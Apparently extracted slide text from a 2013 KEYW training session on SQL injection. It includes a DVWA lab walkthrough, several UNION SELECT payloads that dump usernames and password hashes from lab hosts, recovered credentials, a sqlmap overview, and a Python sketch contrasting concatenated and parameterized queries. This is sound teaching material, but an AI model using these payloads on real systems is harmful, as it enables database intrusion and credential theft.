KEYW Corporation
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
Web Application
Inject Commands
SQL DATABASE
Users Table: id, password, username
Blog Entries: id, blog_post
Products Table: id, name, description
SQL Basics
SELECT: extracts data from a table
SELECT username, phone_number FROM users WHERE username='Bob';
#, -- , /*comment*/
Comment syntax is used to close/balance SQL queries; it is also used to assist in malicious SQL statements.
password
2. Select low
3. Click Submit
Note: this is a MySQL-specific command; if it were another database such as MSSQL, it would have failed. SQL differs between database type and version.
Full statement: SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT 1, @@version #'
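The full statement above is possible because the application builds the query by concatenating the user_id value into the SQL text. As an added example (not part of the original slides), this Python sketch contrasts that pattern with a bound parameter. It assumes SQLite in place of MySQL so it runs offline, so `sqlite_version()` and `--` stand in for `@@version` and `#`; the table rows and function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the users table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT, password TEXT)"
    )
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [("1", "Alice", "Admin", "hash-a"), ("2", "Bob", "Brown", "hash-b")],
    )
    return db


def lookup_concatenated(db, user_id):
    """Vulnerable pattern: the input becomes part of the SQL text itself."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, user_id):
    """Hardened pattern: the driver binds the input as a value, never as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()


# Same shape as the slide's statement, ported to SQLite syntax (assumption).
CRAFTED = "' UNION SELECT 1, sqlite_version() --"

if __name__ == "__main__":
    db = make_db()
    # Normal input: both functions return the matching user.
    print(lookup_concatenated(db, "1"), lookup_parameterized(db, "1"))
    # Crafted input: concatenation runs the injected UNION and returns a
    # row the developer never intended to expose.
    print(lookup_concatenated(db, CRAFTED))
    # Bound parameter: the whole string is compared to user_id as data,
    # nothing matches, and no extra query runs.
    print(lookup_parameterized(db, CRAFTED))
```

With the bound parameter the quote and UNION keyword never reach the SQL parser, which is why the fix belongs in how the query is built rather than in filtering input characters.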
SQL DATABASE
users Table: id, password, username
VIEWS Table: id, usr
columns_priv Table: id, db, host
user_id
password
avatar
first_name
last_name
user
table_name = 'users'
id
1 2 3
user
admin gordonb 1337
avatar
http://192.168... http://192.168... http://192.168...
password
...
...
...
...
I can now log into DVWA with the username gordonb and the password of abc123!
KEYW Corporation 7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076 T: 443.733.1600 cybertraining@keywcorp.com training.keywcorp.com
http://172.16.35.12/announcement.php?a_id=' or 1='1
http://172.16.35.12/announcement.php?a_id=' UNION SELECT null, username, null, powercontrol FROM users WHERE 1='1
http://172.16.35.13/announcement.php?a_id=' UNION SELECT null, username, null, passwordhash FROM users WHERE 1='1
Username: jlilley
Password: jellybean
sqlmap
Python script to perform automated SQL injections and extract data.
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
sqlmap
Developers
Bernardo Damele A. G. (@inquisb) Miroslav Stampar (@stamparm)
Website: sqlmap.org
Sqlmap wizard
Questions?
www.keywcorp.com/cybersessions
October Events:
Recovering Deleted USB files: 10 October 2013 (Thursday)
Web Application Attacks: 15 October 2013 (Tuesday)
Wi-Fi Hacking and Honeypots: 17 October 2013 (Thursday)
Recovering Deleted USB files: 22 October 2013 (Tuesday)
Metasploit Crash Course: 24 October 2013 (Thursday)
Mobile Phone Security: 29 October 2013 (Tuesday)